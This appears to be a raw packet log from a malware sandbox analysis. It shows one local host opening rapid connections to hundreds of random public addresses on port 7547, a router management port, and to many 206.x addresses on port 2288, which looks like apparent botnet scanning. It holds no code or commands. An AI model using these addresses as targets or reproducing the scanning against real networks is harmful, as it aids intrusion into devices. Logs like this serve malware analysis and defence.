                                          Nov 7, 2024 11:57:58.404838085 CET7547305662.171.248.24192.168.2.13
                                          Nov 7, 2024 11:57:58.404839039 CET228880192.168.2.13206.246.224.220
                                          Nov 7, 2024 11:57:58.404853106 CET75473056146.186.69.83192.168.2.13
                                          Nov 7, 2024 11:57:58.404854059 CET228880192.168.2.13206.228.145.222
                                          Nov 7, 2024 11:57:58.404854059 CET30567547192.168.2.1362.110.206.147
                                          Nov 7, 2024 11:57:58.404860973 CET30567547192.168.2.13170.6.27.3
                                          Nov 7, 2024 11:57:58.404865980 CET7547305684.192.209.35192.168.2.13
                                          Nov 7, 2024 11:57:58.404867887 CET30567547192.168.2.13153.27.160.64
                                          Nov 7, 2024 11:57:58.404869080 CET30567547192.168.2.13181.33.235.236
                                          Nov 7, 2024 11:57:58.404879093 CET30567547192.168.2.13108.140.205.74
                                          Nov 7, 2024 11:57:58.404880047 CET30567547192.168.2.13103.198.243.13
                                          Nov 7, 2024 11:57:58.404880047 CET75473056125.245.77.162192.168.2.13
                                          Nov 7, 2024 11:57:58.404881001 CET228880192.168.2.13206.163.233.244
                                          Nov 7, 2024 11:57:58.404891968 CET30567547192.168.2.1362.171.248.24
                                          Nov 7, 2024 11:57:58.404891968 CET30567547192.168.2.13146.186.69.83
                                          Nov 7, 2024 11:57:58.404894114 CET75473056192.91.236.190192.168.2.13
                                          Nov 7, 2024 11:57:58.404906034 CET30567547192.168.2.1384.192.209.35
                                          Nov 7, 2024 11:57:58.404907942 CET7547305631.160.190.224192.168.2.13
                                          Nov 7, 2024 11:57:58.404912949 CET30567547192.168.2.13125.245.77.162
                                          Nov 7, 2024 11:57:58.404920101 CET7547305632.28.238.154192.168.2.13
                                          Nov 7, 2024 11:57:58.404927015 CET30567547192.168.2.13192.91.236.190
                                          Nov 7, 2024 11:57:58.404932022 CET75473056156.93.0.40192.168.2.13
                                          Nov 7, 2024 11:57:58.404942989 CET228880192.168.2.13206.245.55.199
                                          Nov 7, 2024 11:57:58.404944897 CET30567547192.168.2.1331.160.190.224
                                          Nov 7, 2024 11:57:58.404944897 CET7547305674.179.33.132192.168.2.13
                                          Nov 7, 2024 11:57:58.404953003 CET228880192.168.2.13206.93.20.187
                                          Nov 7, 2024 11:57:58.404953003 CET30567547192.168.2.1332.28.238.154
                                          Nov 7, 2024 11:57:58.404958963 CET7547305682.4.179.225192.168.2.13
                                          Nov 7, 2024 11:57:58.404962063 CET30567547192.168.2.13156.93.0.40
                                          Nov 7, 2024 11:57:58.404972076 CET75473056131.3.167.142192.168.2.13
                                          Nov 7, 2024 11:57:58.404978037 CET30567547192.168.2.1374.179.33.132
                                          Nov 7, 2024 11:57:58.404978991 CET228880192.168.2.13206.236.204.127
                                          Nov 7, 2024 11:57:58.404980898 CET228880192.168.2.13206.235.214.156
                                          Nov 7, 2024 11:57:58.404985905 CET30567547192.168.2.1382.4.179.225
                                          Nov 7, 2024 11:57:58.404990911 CET228880192.168.2.13206.61.98.110
                                          Nov 7, 2024 11:57:58.405002117 CET30567547192.168.2.13131.3.167.142
                                          Nov 7, 2024 11:57:58.405025005 CET228880192.168.2.13206.146.226.240
                                          Nov 7, 2024 11:57:58.405036926 CET228880192.168.2.13206.140.60.218
                                          Nov 7, 2024 11:57:58.405076027 CET228880192.168.2.13206.184.157.105
                                          Nov 7, 2024 11:57:58.405081987 CET7547305624.58.137.218192.168.2.13
                                          Nov 7, 2024 11:57:58.405093908 CET228880192.168.2.13206.74.38.92
                                          Nov 7, 2024 11:57:58.405095100 CET7547305682.29.45.61192.168.2.13
                                          Nov 7, 2024 11:57:58.405102968 CET228880192.168.2.13206.115.198.2
                                          Nov 7, 2024 11:57:58.405112028 CET7547305653.155.77.5192.168.2.13
                                          Nov 7, 2024 11:57:58.405121088 CET228880192.168.2.13206.85.132.202
                                          Nov 7, 2024 11:57:58.405122995 CET228880192.168.2.13206.41.170.0
                                          Nov 7, 2024 11:57:58.405122995 CET228880192.168.2.13206.103.125.107
                                          Nov 7, 2024 11:57:58.405122995 CET30567547192.168.2.1324.58.137.218
                                          Nov 7, 2024 11:57:58.405131102 CET75473056162.241.153.53192.168.2.13
                                          Nov 7, 2024 11:57:58.405136108 CET30567547192.168.2.1382.29.45.61
                                          Nov 7, 2024 11:57:58.405143976 CET75473056130.142.208.194192.168.2.13
                                          Nov 7, 2024 11:57:58.405144930 CET228880192.168.2.13206.219.219.30
                                          Nov 7, 2024 11:57:58.405157089 CET228880192.168.2.13206.73.44.109
                                          Nov 7, 2024 11:57:58.405157089 CET7547305674.198.21.122192.168.2.13
                                          Nov 7, 2024 11:57:58.405169964 CET7547305672.8.58.80192.168.2.13
                                          Nov 7, 2024 11:57:58.405174971 CET30567547192.168.2.13162.241.153.53
                                          Nov 7, 2024 11:57:58.405178070 CET30567547192.168.2.1353.155.77.5
                                          Nov 7, 2024 11:57:58.405180931 CET30567547192.168.2.13130.142.208.194
                                          Nov 7, 2024 11:57:58.405183077 CET75473056118.81.130.110192.168.2.13
                                          Nov 7, 2024 11:57:58.405194998 CET228880192.168.2.13206.177.141.25
                                          Nov 7, 2024 11:57:58.405195951 CET7547305691.101.216.102192.168.2.13
                                          Nov 7, 2024 11:57:58.405195951 CET228880192.168.2.13206.45.141.244
                                          Nov 7, 2024 11:57:58.405195951 CET30567547192.168.2.1374.198.21.122
                                          Nov 7, 2024 11:57:58.405205011 CET30567547192.168.2.1372.8.58.80
                                          Nov 7, 2024 11:57:58.405214071 CET30567547192.168.2.13118.81.130.110
                                          Nov 7, 2024 11:57:58.405215979 CET228880192.168.2.13206.104.35.171
                                          Nov 7, 2024 11:57:58.405217886 CET7547305697.121.204.101192.168.2.13
                                          Nov 7, 2024 11:57:58.405219078 CET228880192.168.2.13206.150.135.211
                                          Nov 7, 2024 11:57:58.405219078 CET228880192.168.2.13206.218.98.219
                                          Nov 7, 2024 11:57:58.405230045 CET30567547192.168.2.1391.101.216.102
                                          Nov 7, 2024 11:57:58.405231953 CET75473056120.123.23.99192.168.2.13
                                          Nov 7, 2024 11:57:58.405239105 CET228880192.168.2.13206.230.181.47
                                          Nov 7, 2024 11:57:58.405244112 CET7547305647.223.93.47192.168.2.13
                                          Nov 7, 2024 11:57:58.405257940 CET7547305635.34.235.124192.168.2.13
                                          Nov 7, 2024 11:57:58.405257940 CET30567547192.168.2.1397.121.204.101
                                          Nov 7, 2024 11:57:58.405257940 CET228880192.168.2.13206.155.36.27
                                          Nov 7, 2024 11:57:58.405271053 CET754730568.243.228.99192.168.2.13
                                          Nov 7, 2024 11:57:58.405283928 CET75473056112.136.226.102192.168.2.13
                                          Nov 7, 2024 11:57:58.405287027 CET30567547192.168.2.1335.34.235.124
                                          Nov 7, 2024 11:57:58.405286074 CET228880192.168.2.13206.145.155.3
                                          Nov 7, 2024 11:57:58.405286074 CET228880192.168.2.13206.83.209.62
                                          Nov 7, 2024 11:57:58.405297041 CET754730564.151.19.148192.168.2.13
                                          Nov 7, 2024 11:57:58.405299902 CET30567547192.168.2.13120.123.23.99
                                          Nov 7, 2024 11:57:58.405299902 CET228880192.168.2.13206.63.99.181
                                          Nov 7, 2024 11:57:58.405303001 CET30567547192.168.2.138.243.228.99
                                          Nov 7, 2024 11:57:58.405303955 CET228880192.168.2.13206.97.121.140
                                          Nov 7, 2024 11:57:58.405308008 CET30567547192.168.2.1347.223.93.47
                                          Nov 7, 2024 11:57:58.405309916 CET75473056173.186.159.121192.168.2.13
                                          Nov 7, 2024 11:57:58.405322075 CET30567547192.168.2.13112.136.226.102
                                          Nov 7, 2024 11:57:58.405323029 CET7547305699.80.23.9192.168.2.13
                                          Nov 7, 2024 11:57:58.405335903 CET30567547192.168.2.134.151.19.148
                                          Nov 7, 2024 11:57:58.405337095 CET75473056142.136.120.249192.168.2.13
                                          Nov 7, 2024 11:57:58.405349970 CET30567547192.168.2.13173.186.159.121
                                          Nov 7, 2024 11:57:58.405353069 CET30567547192.168.2.1399.80.23.9
                                          Nov 7, 2024 11:57:58.405364990 CET30567547192.168.2.13142.136.120.249
                                          Nov 7, 2024 11:57:58.405383110 CET228880192.168.2.13206.92.112.21
                                          Nov 7, 2024 11:57:58.405389071 CET228880192.168.2.13206.121.59.125
                                          Nov 7, 2024 11:57:58.405400991 CET228880192.168.2.13206.204.69.109
                                          Nov 7, 2024 11:57:58.405433893 CET228880192.168.2.13206.175.11.51
                                          Nov 7, 2024 11:57:58.405436993 CET228880192.168.2.13206.118.125.178
                                          Nov 7, 2024 11:57:58.405442953 CET228880192.168.2.13206.200.147.46
                                          Nov 7, 2024 11:57:58.405456066 CET75473056125.95.233.22192.168.2.13
                                          Nov 7, 2024 11:57:58.405461073 CET228880192.168.2.13206.104.63.78
                                          Nov 7, 2024 11:57:58.405461073 CET228880192.168.2.13206.117.251.155
                                          Nov 7, 2024 11:57:58.405468941 CET75473056198.237.139.131192.168.2.13
                                          Nov 7, 2024 11:57:58.405482054 CET7547305695.242.153.3192.168.2.13
                                          Nov 7, 2024 11:57:58.405494928 CET75473056158.176.81.142192.168.2.13
                                          Nov 7, 2024 11:57:58.405498028 CET30567547192.168.2.13198.237.139.131
                                          Nov 7, 2024 11:57:58.405505896 CET30567547192.168.2.1395.242.153.3
                                          Nov 7, 2024 11:57:58.405507088 CET75473056153.57.37.175192.168.2.13
                                          Nov 7, 2024 11:57:58.405519962 CET7547305639.52.219.117192.168.2.13
                                          Nov 7, 2024 11:57:58.405529022 CET30567547192.168.2.13158.176.81.142
                                          Nov 7, 2024 11:57:58.405534983 CET7547305667.224.165.91192.168.2.13
                                          Nov 7, 2024 11:57:58.405540943 CET30567547192.168.2.13153.57.37.175
                                          Nov 7, 2024 11:57:58.405550003 CET75473056162.178.198.236192.168.2.13
                                          Nov 7, 2024 11:57:58.405550957 CET30567547192.168.2.13125.95.233.22
                                          Nov 7, 2024 11:57:58.405550957 CET30567547192.168.2.1339.52.219.117
                                          Nov 7, 2024 11:57:58.405550957 CET228880192.168.2.13206.104.221.189
                                          Nov 7, 2024 11:57:58.405550957 CET228880192.168.2.13206.48.227.0
                                          Nov 7, 2024 11:57:58.405553102 CET228880192.168.2.13206.225.252.99
                                          Nov 7, 2024 11:57:58.405563116 CET7547305676.111.73.243192.168.2.13
                                          Nov 7, 2024 11:57:58.405565023 CET30567547192.168.2.1367.224.165.91
                                          Nov 7, 2024 11:57:58.405575991 CET75473056122.80.113.13192.168.2.13
                                          Nov 7, 2024 11:57:58.405586004 CET228880192.168.2.13206.102.120.168
                                          Nov 7, 2024 11:57:58.405589104 CET7547305668.139.189.140192.168.2.13
                                          Nov 7, 2024 11:57:58.405592918 CET30567547192.168.2.1376.111.73.243
                                          Nov 7, 2024 11:57:58.405601025 CET30567547192.168.2.13162.178.198.236
                                          Nov 7, 2024 11:57:58.405601025 CET228880192.168.2.13206.149.106.92
                                          Nov 7, 2024 11:57:58.405602932 CET7547305677.56.110.109192.168.2.13
                                          Nov 7, 2024 11:57:58.405610085 CET30567547192.168.2.13122.80.113.13
                                          Nov 7, 2024 11:57:58.405616045 CET7547305672.34.153.160192.168.2.13
                                          Nov 7, 2024 11:57:58.405622005 CET228880192.168.2.13206.41.61.97
                                          Nov 7, 2024 11:57:58.405622005 CET30567547192.168.2.1368.139.189.140
                                          Nov 7, 2024 11:57:58.405630112 CET75473056220.12.160.29192.168.2.13
                                          Nov 7, 2024 11:57:58.405635118 CET30567547192.168.2.1377.56.110.109
                                          Nov 7, 2024 11:57:58.405643940 CET75473056197.116.91.99192.168.2.13
                                          Nov 7, 2024 11:57:58.405644894 CET30567547192.168.2.1372.34.153.160
                                          Nov 7, 2024 11:57:58.405657053 CET754730561.63.92.231192.168.2.13
                                          Nov 7, 2024 11:57:58.405658960 CET30567547192.168.2.13220.12.160.29
                                          Nov 7, 2024 11:57:58.405668974 CET228880192.168.2.13206.52.254.96
                                          Nov 7, 2024 11:57:58.405669928 CET75473056119.41.174.105192.168.2.13
                                          Nov 7, 2024 11:57:58.405672073 CET30567547192.168.2.13197.116.91.99
                                          Nov 7, 2024 11:57:58.405673981 CET228880192.168.2.13206.90.22.62
                                          Nov 7, 2024 11:57:58.405684948 CET30567547192.168.2.131.63.92.231
                                          Nov 7, 2024 11:57:58.405684948 CET75473056137.55.144.186192.168.2.13
                                          Nov 7, 2024 11:57:58.405689001 CET228880192.168.2.13206.171.18.80
                                          Nov 7, 2024 11:57:58.405698061 CET7547305623.91.103.252192.168.2.13
                                          Nov 7, 2024 11:57:58.405699968 CET30567547192.168.2.13119.41.174.105
                                          Nov 7, 2024 11:57:58.405714035 CET30567547192.168.2.13137.55.144.186
                                          Nov 7, 2024 11:57:58.405740023 CET30567547192.168.2.1323.91.103.252
                                          Nov 7, 2024 11:57:58.405740023 CET228880192.168.2.13206.251.90.63
                                          Nov 7, 2024 11:57:58.405747890 CET228880192.168.2.13206.138.239.244
                                          Nov 7, 2024 11:57:58.405757904 CET228880192.168.2.13206.255.172.14
                                          Nov 7, 2024 11:57:58.405762911 CET228880192.168.2.13206.154.229.187
                                          Nov 7, 2024 11:57:58.405765057 CET75473056177.40.33.238192.168.2.13
                                          Nov 7, 2024 11:57:58.405775070 CET228880192.168.2.13206.169.4.41
                                          Nov 7, 2024 11:57:58.405777931 CET75473056181.146.254.106192.168.2.13
                                          Nov 7, 2024 11:57:58.405791044 CET75473056155.122.177.98192.168.2.13
                                          Nov 7, 2024 11:57:58.405795097 CET228880192.168.2.13206.175.29.17
                                          Nov 7, 2024 11:57:58.405795097 CET30567547192.168.2.13177.40.33.238
                                          Nov 7, 2024 11:57:58.405803919 CET7547305613.107.42.153192.168.2.13
                                          Nov 7, 2024 11:57:58.405806065 CET30567547192.168.2.13181.146.254.106
                                          Nov 7, 2024 11:57:58.405817032 CET75473056181.110.239.122192.168.2.13
                                          Nov 7, 2024 11:57:58.405828953 CET75473056180.57.120.234192.168.2.13
                                          Nov 7, 2024 11:57:58.405838013 CET30567547192.168.2.13155.122.177.98
                                          Nov 7, 2024 11:57:58.405838966 CET30567547192.168.2.1313.107.42.153
                                          Nov 7, 2024 11:57:58.405847073 CET30567547192.168.2.13181.110.239.122
                                          Nov 7, 2024 11:57:58.405860901 CET30567547192.168.2.13180.57.120.234
                                          Nov 7, 2024 11:57:58.405870914 CET228880192.168.2.13206.211.90.190
                                          Nov 7, 2024 11:57:58.405884027 CET228880192.168.2.13206.97.184.55
                                          Nov 7, 2024 11:57:58.405885935 CET228880192.168.2.13206.133.4.30
                                          Nov 7, 2024 11:57:58.405903101 CET228880192.168.2.13206.225.179.47
                                          Nov 7, 2024 11:57:58.405905008 CET228880192.168.2.13206.141.153.6
                                          Nov 7, 2024 11:57:58.405905008 CET228880192.168.2.13206.206.220.243
                                          Nov 7, 2024 11:57:58.405919075 CET75473056164.161.233.227192.168.2.13
                                          Nov 7, 2024 11:57:58.405921936 CET228880192.168.2.13206.131.156.90
                                          Nov 7, 2024 11:57:58.405921936 CET228880192.168.2.13206.138.107.87
                                          Nov 7, 2024 11:57:58.405927896 CET228880192.168.2.13206.109.247.185
                                          Nov 7, 2024 11:57:58.405932903 CET7547305652.88.4.173192.168.2.13
                                          Nov 7, 2024 11:57:58.405936956 CET228880192.168.2.13206.117.132.66
                                          Nov 7, 2024 11:57:58.405945063 CET7547305696.116.26.173192.168.2.13
                                          Nov 7, 2024 11:57:58.405949116 CET30567547192.168.2.13164.161.233.227
                                          Nov 7, 2024 11:57:58.405952930 CET228880192.168.2.13206.182.235.52
                                          Nov 7, 2024 11:57:58.405957937 CET75473056176.150.73.48192.168.2.13
                                          Nov 7, 2024 11:57:58.405960083 CET228880192.168.2.13206.234.5.127
                                          Nov 7, 2024 11:57:58.405961990 CET30567547192.168.2.1352.88.4.173
                                          Nov 7, 2024 11:57:58.405961990 CET228880192.168.2.13206.48.144.140
                                          Nov 7, 2024 11:57:58.405971050 CET75473056145.1.70.235192.168.2.13
                                          Nov 7, 2024 11:57:58.405982971 CET75473056117.11.200.224192.168.2.13
                                          Nov 7, 2024 11:57:58.405987024 CET30567547192.168.2.1396.116.26.173
                                          Nov 7, 2024 11:57:58.405987024 CET30567547192.168.2.13176.150.73.48
                                          Nov 7, 2024 11:57:58.405997038 CET75473056208.146.214.62192.168.2.13
                                          Nov 7, 2024 11:57:58.406009912 CET75473056143.40.23.154192.168.2.13
                                          Nov 7, 2024 11:57:58.406012058 CET30567547192.168.2.13117.11.200.224
                                          Nov 7, 2024 11:57:58.406012058 CET30567547192.168.2.13145.1.70.235
                                          Nov 7, 2024 11:57:58.406023026 CET75473056155.42.63.78192.168.2.13
                                          Nov 7, 2024 11:57:58.406028986 CET228880192.168.2.13206.160.229.97
                                          Nov 7, 2024 11:57:58.406032085 CET30567547192.168.2.13208.146.214.62
                                          Nov 7, 2024 11:57:58.406035900 CET228880192.168.2.13206.146.210.158
                                          Nov 7, 2024 11:57:58.406035900 CET7547305660.128.206.50192.168.2.13
                                          Nov 7, 2024 11:57:58.406035900 CET30567547192.168.2.13143.40.23.154
                                          Nov 7, 2024 11:57:58.406052113 CET30567547192.168.2.13155.42.63.78
                                          Nov 7, 2024 11:57:58.406059980 CET7547305692.253.170.241192.168.2.13
                                          Nov 7, 2024 11:57:58.406073093 CET75473056219.215.191.204192.168.2.13
                                          Nov 7, 2024 11:57:58.406085014 CET7547305613.35.116.67192.168.2.13
                                          Nov 7, 2024 11:57:58.406085014 CET228880192.168.2.13206.148.198.76
                                          Nov 7, 2024 11:57:58.406090975 CET30567547192.168.2.1360.128.206.50
                                          Nov 7, 2024 11:57:58.406090975 CET30567547192.168.2.1392.253.170.241
                                          Nov 7, 2024 11:57:58.406097889 CET754730569.239.20.132192.168.2.13
                                          Nov 7, 2024 11:57:58.406102896 CET30567547192.168.2.13219.215.191.204
                                          Nov 7, 2024 11:57:58.406105042 CET228880192.168.2.13206.132.79.61
                                          Nov 7, 2024 11:57:58.406106949 CET228880192.168.2.13206.141.186.100
                                          Nov 7, 2024 11:57:58.406110048 CET7547305687.171.48.186192.168.2.13
                                          Nov 7, 2024 11:57:58.406111956 CET30567547192.168.2.1313.35.116.67
                                          Nov 7, 2024 11:57:58.406117916 CET228880192.168.2.13206.110.200.228
                                          Nov 7, 2024 11:57:58.406122923 CET754730569.29.229.41192.168.2.13
                                          Nov 7, 2024 11:57:58.406126022 CET30567547192.168.2.139.239.20.132
                                          Nov 7, 2024 11:57:58.406135082 CET228880192.168.2.13206.22.77.15
                                          Nov 7, 2024 11:57:58.406135082 CET228880192.168.2.13206.120.169.220
                                          Nov 7, 2024 11:57:58.406137943 CET754730568.74.51.116192.168.2.13
                                          Nov 7, 2024 11:57:58.406141043 CET30567547192.168.2.1387.171.48.186
                                          Nov 7, 2024 11:57:58.406151056 CET75473056144.181.55.33192.168.2.13
                                          Nov 7, 2024 11:57:58.406152964 CET30567547192.168.2.139.29.229.41
                                          Nov 7, 2024 11:57:58.406164885 CET75473056186.193.154.236192.168.2.13
                                          Nov 7, 2024 11:57:58.406167030 CET30567547192.168.2.138.74.51.116
                                          Nov 7, 2024 11:57:58.406177998 CET75473056148.35.104.55192.168.2.13
                                          Nov 7, 2024 11:57:58.406179905 CET30567547192.168.2.13144.181.55.33
                                          Nov 7, 2024 11:57:58.406191111 CET75473056151.26.163.200192.168.2.13
                                          Nov 7, 2024 11:57:58.406193018 CET228880192.168.2.13206.47.152.99
                                          Nov 7, 2024 11:57:58.406193972 CET30567547192.168.2.13186.193.154.236
                                          Nov 7, 2024 11:57:58.406205893 CET75473056155.230.29.80192.168.2.13
                                          Nov 7, 2024 11:57:58.406215906 CET30567547192.168.2.13148.35.104.55
                                          Nov 7, 2024 11:57:58.406219006 CET7547305669.1.251.67192.168.2.13
                                          Nov 7, 2024 11:57:58.406223059 CET228880192.168.2.13206.49.136.217
                                          Nov 7, 2024 11:57:58.406224966 CET30567547192.168.2.13151.26.163.200
                                          Nov 7, 2024 11:57:58.406232119 CET7547305672.68.255.126192.168.2.13
                                          Nov 7, 2024 11:57:58.406234980 CET30567547192.168.2.13155.230.29.80
                                          Nov 7, 2024 11:57:58.406245947 CET75473056169.218.236.31192.168.2.13
                                          Nov 7, 2024 11:57:58.406249046 CET30567547192.168.2.1369.1.251.67
                                          Nov 7, 2024 11:57:58.406260014 CET75473056110.193.241.116192.168.2.13
                                          Nov 7, 2024 11:57:58.406260967 CET30567547192.168.2.1372.68.255.126
                                          Nov 7, 2024 11:57:58.406271935 CET75473056219.205.85.136192.168.2.13
                                          Nov 7, 2024 11:57:58.406285048 CET75473056164.16.239.219192.168.2.13
                                          Nov 7, 2024 11:57:58.406285048 CET30567547192.168.2.13169.218.236.31
                                          Nov 7, 2024 11:57:58.406291008 CET30567547192.168.2.13110.193.241.116
                                          Nov 7, 2024 11:57:58.406322956 CET30567547192.168.2.13164.16.239.219
                                          Nov 7, 2024 11:57:58.406325102 CET30567547192.168.2.13219.205.85.136
                                          Nov 7, 2024 11:57:58.406353951 CET7547305635.141.195.238192.168.2.13
                                          Nov 7, 2024 11:57:58.406367064 CET75473056139.106.5.253192.168.2.13
                                          Nov 7, 2024 11:57:58.406369925 CET228880192.168.2.13206.208.229.195
                                          Nov 7, 2024 11:57:58.406374931 CET228880192.168.2.13206.96.132.70
                                          Nov 7, 2024 11:57:58.406379938 CET7547305680.188.44.69192.168.2.13
                                          Nov 7, 2024 11:57:58.406382084 CET228880192.168.2.13206.116.121.140
                                          Nov 7, 2024 11:57:58.406385899 CET30567547192.168.2.1335.141.195.238
                                          Nov 7, 2024 11:57:58.406393051 CET75473056158.55.137.149192.168.2.13
                                          Nov 7, 2024 11:57:58.406407118 CET7547305681.20.53.211192.168.2.13
                                          Nov 7, 2024 11:57:58.406418085 CET30567547192.168.2.1380.188.44.69
                                          Nov 7, 2024 11:57:58.406418085 CET30567547192.168.2.13139.106.5.253
                                          Nov 7, 2024 11:57:58.406420946 CET7547305651.17.168.194192.168.2.13
                                          Nov 7, 2024 11:57:58.406430006 CET75473056124.212.105.90192.168.2.13
                                          Nov 7, 2024 11:57:58.406435013 CET30567547192.168.2.13158.55.137.149
                                          Nov 7, 2024 11:57:58.406438112 CET7547305698.167.47.185192.168.2.13
                                          Nov 7, 2024 11:57:58.406443119 CET228880192.168.2.13206.219.23.50
                                          Nov 7, 2024 11:57:58.406445026 CET75473056180.36.146.203192.168.2.13
                                          Nov 7, 2024 11:57:58.406446934 CET228880192.168.2.13206.26.209.186
                                          Nov 7, 2024 11:57:58.406457901 CET75473056205.114.27.167192.168.2.13
                                          Nov 7, 2024 11:57:58.406464100 CET75473056117.232.26.52192.168.2.13
                                          Nov 7, 2024 11:57:58.406471014 CET75473056121.27.153.142192.168.2.13
                                          Nov 7, 2024 11:57:58.406471968 CET228880192.168.2.13206.75.0.8
                                          Nov 7, 2024 11:57:58.406472921 CET30567547192.168.2.1381.20.53.211
                                          Nov 7, 2024 11:57:58.406476974 CET7547305646.100.28.197192.168.2.13
                                          Nov 7, 2024 11:57:58.406481028 CET30567547192.168.2.1351.17.168.194
                                          Nov 7, 2024 11:57:58.406481028 CET30567547192.168.2.13124.212.105.90
                                          Nov 7, 2024 11:57:58.406481028 CET30567547192.168.2.1398.167.47.185
                                          Nov 7, 2024 11:57:58.406483889 CET7547305614.185.92.225192.168.2.13
                                          Nov 7, 2024 11:57:58.406491041 CET7547305645.147.202.15192.168.2.13
                                          Nov 7, 2024 11:57:58.406497955 CET75473056163.116.232.77192.168.2.13
                                          Nov 7, 2024 11:57:58.406502008 CET228880192.168.2.13206.113.130.251
                                          Nov 7, 2024 11:57:58.406502962 CET228880192.168.2.13206.137.247.121
                                          Nov 7, 2024 11:57:58.406503916 CET75473056163.251.170.208192.168.2.13
                                          Nov 7, 2024 11:57:58.406511068 CET75473056172.182.81.217192.168.2.13
                                          Nov 7, 2024 11:57:58.406517982 CET228880192.168.2.13206.254.200.113
                                          Nov 7, 2024 11:57:58.406517982 CET75473056148.218.87.152192.168.2.13
                                          Nov 7, 2024 11:57:58.406533003 CET75473056146.78.54.60192.168.2.13
                                          Nov 7, 2024 11:57:58.406544924 CET30567547192.168.2.13205.114.27.167
                                          Nov 7, 2024 11:57:58.406547070 CET75473056114.34.239.63192.168.2.13
                                          Nov 7, 2024 11:57:58.406548977 CET30567547192.168.2.13180.36.146.203
                                          Nov 7, 2024 11:57:58.406550884 CET30567547192.168.2.13148.218.87.152
                                          Nov 7, 2024 11:57:58.406555891 CET30567547192.168.2.13117.232.26.52
                                          Nov 7, 2024 11:57:58.406560898 CET7547305672.203.36.89192.168.2.13
                                          Nov 7, 2024 11:57:58.406563997 CET30567547192.168.2.13121.27.153.142
                                          Nov 7, 2024 11:57:58.406563997 CET228880192.168.2.13206.83.171.244
                                          Nov 7, 2024 11:57:58.406564951 CET228880192.168.2.13206.193.5.212
                                          Nov 7, 2024 11:57:58.406574965 CET7547305670.14.77.235192.168.2.13
                                          Nov 7, 2024 11:57:58.406575918 CET30567547192.168.2.1346.100.28.197
                                          Nov 7, 2024 11:57:58.406579018 CET30567547192.168.2.1345.147.202.15
                                          Nov 7, 2024 11:57:58.406579971 CET30567547192.168.2.1314.185.92.225
                                          Nov 7, 2024 11:57:58.406584978 CET228880192.168.2.13206.82.219.43
                                          Nov 7, 2024 11:57:58.406589031 CET754730564.241.252.175192.168.2.13
                                          Nov 7, 2024 11:57:58.406591892 CET30567547192.168.2.1372.203.36.89
                                          Nov 7, 2024 11:57:58.406596899 CET30567547192.168.2.13163.251.170.208
                                          Nov 7, 2024 11:57:58.406596899 CET30567547192.168.2.13163.116.232.77
                                          Nov 7, 2024 11:57:58.406596899 CET30567547192.168.2.13146.78.54.60
                                          Nov 7, 2024 11:57:58.406596899 CET30567547192.168.2.13172.182.81.217
                                          Nov 7, 2024 11:57:58.406599045 CET30567547192.168.2.13114.34.239.63
                                          Nov 7, 2024 11:57:58.406599045 CET30567547192.168.2.1370.14.77.235
                                          Nov 7, 2024 11:57:58.406601906 CET75473056208.41.69.45192.168.2.13
                                          Nov 7, 2024 11:57:58.406615019 CET228880192.168.2.13206.170.128.125
                                          Nov 7, 2024 11:57:58.406615973 CET7547305652.20.138.206192.168.2.13
                                          Nov 7, 2024 11:57:58.406620026 CET30567547192.168.2.134.241.252.175
                                          Nov 7, 2024 11:57:58.406629086 CET7547305663.38.44.222192.168.2.13
                                          Nov 7, 2024 11:57:58.406631947 CET30567547192.168.2.13208.41.69.45
                                          Nov 7, 2024 11:57:58.406641960 CET7547305698.222.41.82192.168.2.13
                                          Nov 7, 2024 11:57:58.406645060 CET30567547192.168.2.1352.20.138.206
                                          Nov 7, 2024 11:57:58.406666994 CET30567547192.168.2.1363.38.44.222
                                          Nov 7, 2024 11:57:58.406666994 CET30567547192.168.2.1398.222.41.82
                                          Nov 7, 2024 11:57:58.406724930 CET7547305689.20.226.216192.168.2.13
                                          Nov 7, 2024 11:57:58.406725883 CET228880192.168.2.13206.156.13.91
                                          Nov 7, 2024 11:57:58.406733036 CET228880192.168.2.13206.16.195.117
                                          Nov 7, 2024 11:57:58.406737089 CET228880192.168.2.13206.24.31.46
                                          Nov 7, 2024 11:57:58.406738997 CET75473056164.53.220.30192.168.2.13
                                          Nov 7, 2024 11:57:58.406750917 CET75473056199.111.152.181192.168.2.13
                                          Nov 7, 2024 11:57:58.406764030 CET75473056204.217.195.0192.168.2.13
                                          Nov 7, 2024 11:57:58.406770945 CET30567547192.168.2.13164.53.220.30
                                          Nov 7, 2024 11:57:58.406775951 CET7547305658.236.98.69192.168.2.13
                                          Nov 7, 2024 11:57:58.406784058 CET228880192.168.2.13206.220.166.83
                                          Nov 7, 2024 11:57:58.406784058 CET30567547192.168.2.13199.111.152.181
                                          Nov 7, 2024 11:57:58.406788111 CET75473056193.55.214.95192.168.2.13
                                          Nov 7, 2024 11:57:58.406800985 CET754730568.238.56.50192.168.2.13
                                          Nov 7, 2024 11:57:58.406800985 CET30567547192.168.2.1389.20.226.216
                                          Nov 7, 2024 11:57:58.406800985 CET30567547192.168.2.13204.217.195.0
                                          Nov 7, 2024 11:57:58.406805992 CET30567547192.168.2.1358.236.98.69
                                          Nov 7, 2024 11:57:58.406805992 CET228880192.168.2.13206.131.44.195
                                          Nov 7, 2024 11:57:58.406812906 CET75473056123.202.14.211192.168.2.13
                                          Nov 7, 2024 11:57:58.406821012 CET30567547192.168.2.13193.55.214.95
                                          Nov 7, 2024 11:57:58.406826973 CET7547305632.3.69.243192.168.2.13
                                          Nov 7, 2024 11:57:58.406835079 CET30567547192.168.2.138.238.56.50
                                          Nov 7, 2024 11:57:58.406841993 CET30567547192.168.2.13123.202.14.211
                                          Nov 7, 2024 11:57:58.406841993 CET75473056119.18.185.183192.168.2.13
                                          Nov 7, 2024 11:57:58.406857014 CET75473056166.103.42.50192.168.2.13
                                          Nov 7, 2024 11:57:58.406863928 CET30567547192.168.2.1332.3.69.243
                                          Nov 7, 2024 11:57:58.406869888 CET75473056131.9.169.61192.168.2.13
                                          Nov 7, 2024 11:57:58.406872988 CET30567547192.168.2.13119.18.185.183
                                          Nov 7, 2024 11:57:58.406876087 CET228880192.168.2.13206.105.186.10
                                          Nov 7, 2024 11:57:58.406883001 CET7547305617.226.200.211192.168.2.13
                                          Nov 7, 2024 11:57:58.406887054 CET30567547192.168.2.13166.103.42.50
                                          Nov 7, 2024 11:57:58.406894922 CET7547305618.209.74.192192.168.2.13
                                          Nov 7, 2024 11:57:58.406904936 CET30567547192.168.2.13131.9.169.61
                                          Nov 7, 2024 11:57:58.406908035 CET75473056159.66.94.166192.168.2.13
                                          Nov 7, 2024 11:57:58.406913996 CET30567547192.168.2.1317.226.200.211
                                          Nov 7, 2024 11:57:58.406922102 CET7547305646.51.106.146192.168.2.13
